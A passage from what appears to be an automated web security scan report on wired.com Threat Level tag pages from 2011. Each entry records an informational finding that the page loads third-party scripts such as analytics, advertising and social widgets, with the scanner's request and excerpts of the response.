<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.199. http://www.wired.com/threatlevel/tag/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/nsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/nsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:50:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:32 GMT
Date: Wed, 12 Jan 2011 15:34:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.200. http://www.wired.com/threatlevel/tag/obama/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/obama/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/obama/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.201. http://www.wired.com/threatlevel/tag/piracy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/piracy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/piracy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:19 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:52 GMT
Date: Wed, 12 Jan 2011 15:34:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.202. http://www.wired.com/threatlevel/tag/pirate-bay-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/pirate-bay-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:16:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:12 GMT
Date: Wed, 12 Jan 2011 15:35:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.203. http://www.wired.com/threatlevel/tag/pirate-bay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/pirate-bay/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:51:58 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=472
Expires: Wed, 12 Jan 2011 15:42:59 GMT
Date: Wed, 12 Jan 2011 15:35:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.204. http://www.wired.com/threatlevel/tag/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.205. http://www.wired.com/threatlevel/tag/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/privacy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/privacy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:20:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=434
Expires: Wed, 12 Jan 2011 15:42:38 GMT
Date: Wed, 12 Jan 2011 15:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.206. http://www.wired.com/threatlevel/tag/riaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/riaa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/riaa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.207. http://www.wired.com/threatlevel/tag/segvec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/segvec/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/segvec/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:26 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:35:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.208. http://www.wired.com/threatlevel/tag/supreme-court/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/supreme-court/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/supreme-court/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.209. http://www.wired.com/threatlevel/tag/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/surveillance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/surveillance/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:39 GMT
Date: Wed, 12 Jan 2011 15:35:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.210. http://www.wired.com/threatlevel/tag/tjx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tjx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/tjx/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:40 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.211. http://www.wired.com/threatlevel/tag/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/tsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.212. http://www.wired.com/threatlevel/tag/twitter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/twitter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/twitter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:54:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=459
Expires: Wed, 12 Jan 2011 15:43:21 GMT
Date: Wed, 12 Jan 2011 15:35:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.213. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/virginia-tech-shootings/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/virginia-tech-shootings/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:06:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:43:41 GMT
Date: Wed, 12 Jan 2011 15:35:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.214. http://www.wired.com/threatlevel/tag/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/wikileaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

